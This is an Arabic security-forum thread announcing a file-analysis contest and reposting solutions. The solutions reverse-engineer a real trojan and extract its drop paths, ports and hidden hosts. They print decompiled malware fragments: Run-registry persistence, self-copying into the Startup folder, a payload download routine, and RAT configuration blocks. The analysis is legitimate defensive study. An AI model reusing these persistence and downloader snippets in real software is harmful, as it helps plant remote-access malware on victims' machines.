1. إستبعاد الملاحظة
  2. الإدارة العامة

    صفحة منتديات زيزووم للأمن والحماية

  3. الإدارة العامة

    الصفحة الرسمية لمنتديات زيزووم للأمن والحماية الفيس بوك

  4. الإدارة العامة

    الصفحة الرسمية لمنتديات زيزووم للأمن والحماية التلكرام

التحدي الثالث بمســابقة فحص الملفات ► 3 ◄

الموضوع في 'منتدى نقاشات واختبارات برامج الحماية' بواسطة m0d!s@r7@n, بتاريخ ‏نوفمبر 1, 2014.

حالة الموضوع:
مغلق
  1. m0d!s@r7@n

    m0d!s@r7@n عضو شرف (خبير فحص الملفات) ★ نجم المنتدى ★

    إنضم إلينا في:
    ‏مارس 24, 2013
    المشاركات:
    3,452
    الإعجابات :
    15,530
    نقاط الجائزة:
    1,220
    الجنس:
    ذكر
    الإقامة:
    مصر
    برامج الحماية:
    Kaspersky
    نظام التشغيل:
    Windows 8


    [​IMG]


    ►◄: أحبابنا ,أعضاء المنتدى الأعزاء :►◄

    أسعد الله يومكم بكل خير ووفقكم لما يحب ويرضى وأسأل الله أن يمن علينا بالخير واليمن والبركة

    يـــســـعـــدنــا أنـ نــقــدمـ لــكــمـ


    التحدي الثالث من







    [​IMG]



    والتي تهدف الى إستثمار الجهود المبذوله من الإخوه الأعضاء بالقسم في مزيد من العطاء والبذل

    في جو تنافسي خلاق والعمل علي إظهار مواهبكم وتطويرها



    يرجى الإطلاع علي شروط المسابقه قبل الإشتراك









    مسابقه زيزوووم لفحص الملفات


    [​IMG]

    ▲▼ المطــــلوب ▼▲

    جلب بيانات الملف التاليه

    - مســـار نزول السيرفر

    - البـورت والهـوست للسيرفر


    تنبيه

    بيانات الملف حقيقيه



    لتحميل ملف المسابقه






    [​IMG]







    [​IMG]







    ▲▼ الباســـورد ▼▲

    هذا المحتوى يظهر للاعضاء المسجلين فقط:
    هذا المحتوى يظهر للاعضاء المسجلين فقط:


    [​IMG]
    ►► طريقة تسليم بيانات ملف المسابقه ◄◄


    - من يصل للبيانات الصحيحه يراسل أحد الأعضاء المسؤلين عن المسابقه

    من أجل الحلول أو الإستفسارات








    qysr

    m0d!s@r7@n

    ـــــــــــــــــــــــــــــ
    ــــــــــــــــ


    نرجوا الإلتزام من الجميع

    ومن يخالف شروط وقوانين المسابقه

    سيتم إخراجه من المسابقه نهائياً

    وفي حالة تكرار المخالفة لـ 3 مرات سيتم حرمانه من الموسم التالي


    [​IMG]

    شكر واجب لاخينا black007 المبدع صاحب ملف المسابقه

    لاختنا الفاضله روايدا صاحبه تصميم وتنسيق الموضوع

    [​IMG]
     
    آخر تعديل: ‏نوفمبر 1, 2014
    dahman_kz ،النموشي ،abu_youssef و 10آخرون معجبون بهذا.
  2. m0d!s@r7@n

    m0d!s@r7@n عضو شرف (خبير فحص الملفات) ★ نجم المنتدى ★

    إنضم إلينا في:
    ‏مارس 24, 2013
    المشاركات:
    3,452
    الإعجابات :
    15,530
    نقاط الجائزة:
    1,220
    الجنس:
    ذكر
    الإقامة:
    مصر
    برامج الحماية:
    Kaspersky
    نظام التشغيل:
    Windows 8
    انتهي وقت المسابقه وسيتم اعلان الفائزين في هذا التحدي
     
    Abdelkarim ،شاجع ،abu_youssef و 4آخرون معجبون بهذا.
  3. m0d!s@r7@n

    m0d!s@r7@n عضو شرف (خبير فحص الملفات) ★ نجم المنتدى ★

    إنضم إلينا في:
    ‏مارس 24, 2013
    المشاركات:
    3,452
    الإعجابات :
    15,530
    نقاط الجائزة:
    1,220
    الجنس:
    ذكر
    الإقامة:
    مصر
    برامج الحماية:
    Kaspersky
    نظام التشغيل:
    Windows 8
    Mazn_TNT

    الازرار التي تؤدي لملفات الاثصال المرادة من المسابقة هي :


    [​IMG]

    [​IMG]

    ننتظر قليلا فيظهر بجدار الحماية الملفين :

    هذا المحتوى يظهر للاعضاء المسجلين فقط:
    هذا المحتوى يظهر للاعضاء المسجلين فقط:


    هذا المحتوى يظهر للاعضاء المسجلين فقط:
    هذا المحتوى يظهر للاعضاء المسجلين فقط:


    و يتصلون بنفس الجهة :

    هذا المحتوى يظهر للاعضاء المسجلين فقط:
    هذا المحتوى يظهر للاعضاء المسجلين فقط:


    و الهوست بالاداة التي يستخدمها الجميع :



    هذا المحتوى يظهر للاعضاء المسجلين فقط:
    هذا المحتوى يظهر للاعضاء المسجلين فقط:



    ------------------------------------
     
    Abdelkarim ،MagicianMiDo32 ،شاجع و 3آخرون معجبون بهذا.
  4. m0d!s@r7@n

    m0d!s@r7@n عضو شرف (خبير فحص الملفات) ★ نجم المنتدى ★

    إنضم إلينا في:
    ‏مارس 24, 2013
    المشاركات:
    3,452
    الإعجابات :
    15,530
    نقاط الجائزة:
    1,220
    الجنس:
    ذكر
    الإقامة:
    مصر
    برامج الحماية:
    Kaspersky
    نظام التشغيل:
    Windows 8
    medo32

    اولا نعمل دمب للملف Contest .exe
    بالMegadumber
    ونحلل البرنامج الناتج بالريفليكتور
    نلاحظ التالي
    مسار النزول
    مجلد AppData باسم SVCHOST.exe

    DzKHZ7.png

    بعد ذلك نفك الملفAnti uلأنه يحتوي على حمايتين
    مرتين بـ De4Dot
    ثم نثبته بـ Universal Fixer
    بعد ذلك نفتح الريفليكتور

    نلاحظ وجود أضافة ستارت أب

    Public Shared Sub AStartup(ByVal Name As String, ByVal Path As String)
    Registry.CurrentUser.OpenSubKey("Software\Microsoft\Windows\CurrentVersion\Run", True).SetValue(RegistryValueKind.String)
    End Sub

    وتحميل ملف لايحمل من أصله

    ==============

    كما يقوم الملف بنسخ نفسه في مجلد الستارت اب

    Dim folderPath As String = Environment.GetFolderPath(SpecialFolder.Startup)

    File.Copy(Application.ExecutablePath, (StartupKey & ".exe"))

    وفتح صفحة بيست بن pastebin
    هذا المحتوى يظهر للاعضاء المسجلين فقط:

    Me.WebBrowser1.Navigate("http://pastebin.com/75yYmA9M")
    AboM

    ندخل على Evil Osama في لكلاس mPE
    ونشغل بلاجن الريفليكسل
    نلاحظ وجود أكواد التخطي
    1.png

    أبحث عن أسم الاداة في بلاجن الريفلكسل

    2.png

    كليك يمين وأختار EDit وغير لأسم كما تشاء
    3.png
    ========
    في Timer3
    MyProject.Computer.Network.DownloadFile(Me.OS, (MyProject.Computer.FileSystem.SpecialDirectories.Temp & "\Updat.exe"))
    لو لاحظت معي هنا
    الرابط الذي سيحمل منه الملف هو المتغير النصي os
    للحصول عليه نضع الكود
    Msgbox(os)
    ليظهر لنا رابط التحميل
    ===================
    الآن كليك يمين على المديول نفسها واختر Reflex وأختر Save as

    4.png
    \

    يظهر لنا صندوق الرسالة الذي وضعناه
    os قيمته لاشيئ
    اذا الملف خدعه وعندك شرط ان ساوت قيمة os ="" يتم تجاهل تحميل الملف
    ياخسارة على الملف كان ممتع:disappointed:

    ====================
    الآن السيرفر الحقيقي

    الآول
    blogger.exe

    Shared Sub New()

    هذا المحتوى يظهر للاعضاء المسجلين فقط:
    هذا المحتوى يظهر للاعضاء المسجلين فقط:

    W.port = "80"
    W.path = "Temp"
    W.exe = "Svchost.exe"
    W.Name = "Victim"
    W.inst = "False"
    W.pro = "True"
    W.Y = "/B|L\"
    W.F = New Computer
    W.C = New TCP
    W.run = False
    W.run1 = False
    W.actv = ""
    End Sub

    الهوست

    هذا المحتوى يظهر للاعضاء المسجلين فقط:
    هذا المحتوى يظهر للاعضاء المسجلين فقط:


    البورت
    80
    مسار النزول
    %Temp%

    إضافة ريجستري
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", W.exe


    الثاني

    Shared Sub New()
    OK.SPR = Conversions.ToBoolean("false")
    OK.b = New Byte(5121 - 1) {}
    OK.BD = Conversions.ToBoolean("False")
    OK.C = Nothing
    OK.Cn = False
    OK.DR = "TEMP"
    OK.EXE = "AFH.exe"
    OK.F = New Computer

    هذا المحتوى يظهر للاعضاء المسجلين فقط:
    هذا المحتوى يظهر للاعضاء المسجلين فقط:

    OK.Idr = Conversions.ToBoolean("true")
    OK.IsF = Conversions.ToBoolean("false")
    OK.Isu = Conversions.ToBoolean("false")
    OK.kq = Nothing
    OK.lastcap = ""
    OK.LO = New FileInfo(Assembly.GetEntryAssembly.Location)
    OK.MeM = New MemoryStream
    OK.MT = Nothing
    OK.P = "80"
    OK.PLG = Nothing
    OK.RG = "23f0e3bce589df29a3e6f3e8879b41c1"
    OK.VN = "SGFjS2Vk"
    OK.VR = "0.7d crack by AFH"
    OK.Y = "|'|'|"
    End Sub

    الهوست:

    هذا المحتوى يظهر للاعضاء المسجلين فقط:
    هذا المحتوى يظهر للاعضاء المسجلين فقط:

    البورت :80
    مسار التوليد:
    %TEMP%
    فكهم كأي تشفيرة
    1 أولا نفك الملف مرتين باستخدام اداة De4dot مرتين متتليتين لاحتوائه على حمايتين
    2 ثانيا نفك الخوارزمية بالموقع

    أو نشغله ونعملة Dumb بالMegadumber وريح دماغك
    أبحث عن عمليته وكلك يمين .net Dumb
    ستجد مجلد بأسم Dumbs أفتحه
    تسجد ملف بأسم W.exe
    أفتحه بالدوت نت ريفليكتور
    ستجد البيانات في أساس الكلاس w
    .occtor
    الثاني ستجد ملف باسم
    bitdefenderawards.exe
    أفتحه بالريفليكتور عادي خالص
    ستجد البيانات في اساس الكلاس ok
     
    Abdelkarim ،MagicianMiDo32 ،شاجع و 2آخرون معجبون بهذا.
  5. m0d!s@r7@n

    m0d!s@r7@n عضو شرف (خبير فحص الملفات) ★ نجم المنتدى ★

    إنضم إلينا في:
    ‏مارس 24, 2013
    المشاركات:
    3,452
    الإعجابات :
    15,530
    نقاط الجائزة:
    1,220
    الجنس:
    ذكر
    الإقامة:
    مصر
    برامج الحماية:
    Kaspersky
    نظام التشغيل:
    Windows 8
    Amr Saad (شرح رائع ومنسق ويستحق ان يكون موضوع)

    البيانات المطلوبة :-

    الملفات الملغومة هى :
    Temp box
    PicturesREP

    ==

    البيانات المتعلقة بالملف Temp box
    الاى بى
    هذا المحتوى يظهر للاعضاء المسجلين فقط:
    هذا المحتوى يظهر للاعضاء المسجلين فقط:

    والبورت 80
    مسار النزول C:\Users\User Name\AppData\Local
    الهوست
    هذا المحتوى يظهر للاعضاء المسجلين فقط:
    هذا المحتوى يظهر للاعضاء المسجلين فقط:

    ==

    البيانات المتعلقة بالملف PicturesREP
    الاى بى
    هذا المحتوى يظهر للاعضاء المسجلين فقط:
    هذا المحتوى يظهر للاعضاء المسجلين فقط:

    والبورت 80
    مسار النزول C:\Users\ User Name
    الهوست
    هذا المحتوى يظهر للاعضاء المسجلين فقط:
    هذا المحتوى يظهر للاعضاء المسجلين فقط:


    ==

    الخدعة الموجودة بالملف ( نسيت اذكرها بالفيديو )
    يجب الضغط على Key 4 مرتين حتى يتم إنشاء اول ملف Temp box
    ويجب الضغط على Key 6 ثلاث مرات حتى يتم إنشاء ثانى ملفPicturesREP

    ==
    الشــرح
    هذا المحتوى يظهر للاعضاء المسجلين فقط:
    هذا المحتوى يظهر للاعضاء المسجلين فقط:


    ( اعتذر على حجم الفيديو الكبير .. رغم انى استخدمت برنامج Instant Demo والشرح بصيغة SWF .. حاولت ضغطه الى اقصى حد ممكن لكن لم ينجح الأمر .. لذا تم تقسيمه الى 3 اجزاء . )

    (اضفت لكم هذا الشرح الاول لاخينا عمرو لمزيد من الفائده)
    هذا المحتوى يظهر للاعضاء المسجلين فقط:
    هذا المحتوى يظهر للاعضاء المسجلين فقط:

     
    qysr ،Abdelkarim ،MagicianMiDo32 و 2آخرون معجبون بهذا.
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...